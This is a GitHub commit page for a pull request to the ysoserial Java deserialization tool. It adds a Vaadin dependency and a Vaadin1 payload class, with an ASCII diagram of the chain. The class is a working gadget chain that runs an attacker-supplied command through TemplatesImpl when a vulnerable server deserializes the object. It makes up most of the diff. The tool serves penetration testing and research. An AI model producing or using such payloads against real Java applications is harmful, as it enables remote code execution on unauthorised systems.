Skip to content

Commit

Permalink
Merge pull request frohoff#91 from supersache/vaadingadget
Browse files Browse the repository at this point in the history 
Vaadin gadget
  • Loading branch information
@frohoff
frohoff authored Nov 20, 2018
2 parents 8cf9802 + e0b15a3 commit f31677f
Show file tree
Hide file tree
Showing 3 changed files with 88 additions and 0 deletions.
5 changes: 5 additions & 0 deletions pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -308,6 +308,11 @@
<artifactId>clojure</artifactId>
<version>1.8.0</version>
</dependency>
<dependency>
<groupId>com.vaadin</groupId>
<artifactId>vaadin-server</artifactId>
<version>7.7.14</version>
</dependency>
</dependencies>

<profiles>
Expand Down
82 changes: 82 additions & 0 deletions src/main/java/ysoserial/payloads/Vaadin1.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,82 @@
package ysoserial.payloads;

import javax.management.BadAttributeValueExpException;

import com.vaadin.data.util.NestedMethodProperty;
import com.vaadin.data.util.PropertysetItem;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

@Dependencies ( { "com.vaadin:vaadin-server:7.7.14", "com.vaadin:vaadin-shared:7.7.14" })
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Authors({ Authors.KULLRICH })
public class Vaadin1 implements ObjectPayload<Object>
{
// +-------------------------------------------------+
// | |
// | BadAttributeValueExpException |
// | |
// | val ==> PropertysetItem |
// | |
// | readObject() ==> val.toString() |
// | + |
// +----------|--------------------------------------+
// |
// |
// |
// +----|-----------------------------------------+
// | v |
// | PropertysetItem |
// | |
// | toString () => getPropertyId().getValue () |
// | + |
// +---------------------------------------|------+
// |
// +-----------------------------+
// |
// +-----|----------------------------------------------+
// | v |
// | NestedMethodProperty |
// | |
// | getValue() => java.lang.reflect.Method.invoke () |
// | | |
// +-------------------------------------------|--------+
// |
// +-----------------------------------+
// |
// +---|--------------------------------------------+
// | v |
// | TemplatesImpl.getOutputProperties() |
// | |
// +------------------------------------------------+

@Override
public Object getObject (String command) throws Exception
{
Object templ = Gadgets.createTemplatesImpl (command);
PropertysetItem pItem = new PropertysetItem ();

NestedMethodProperty<Object> nmprop = new NestedMethodProperty<Object> (templ, "outputProperties");
pItem.addItemProperty ("outputProperties", nmprop);

BadAttributeValueExpException b = new BadAttributeValueExpException ("");
Reflections.setFieldValue (b, "val", pItem);

return b;
}

public static boolean isApplicableJavaVersion() {
return JavaVersion.isBadAttrValExcReadObj();
}

public static void main(final String[] args) throws Exception {
PayloadRunner.run(Vaadin1.class, args);
}

}
1 change: 1 addition & 0 deletions src/main/java/ysoserial/payloads/annotation/Authors.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,7 @@
String GEBL = "gebl" ;
String JACOBAINES = "jacob-baines";
String JASINNER = "jasinner";
String KULLRICH = "kai_ullrich";

String[] value() default {};

Expand Down

0 comments on commit f31677f

Please sign in to comment.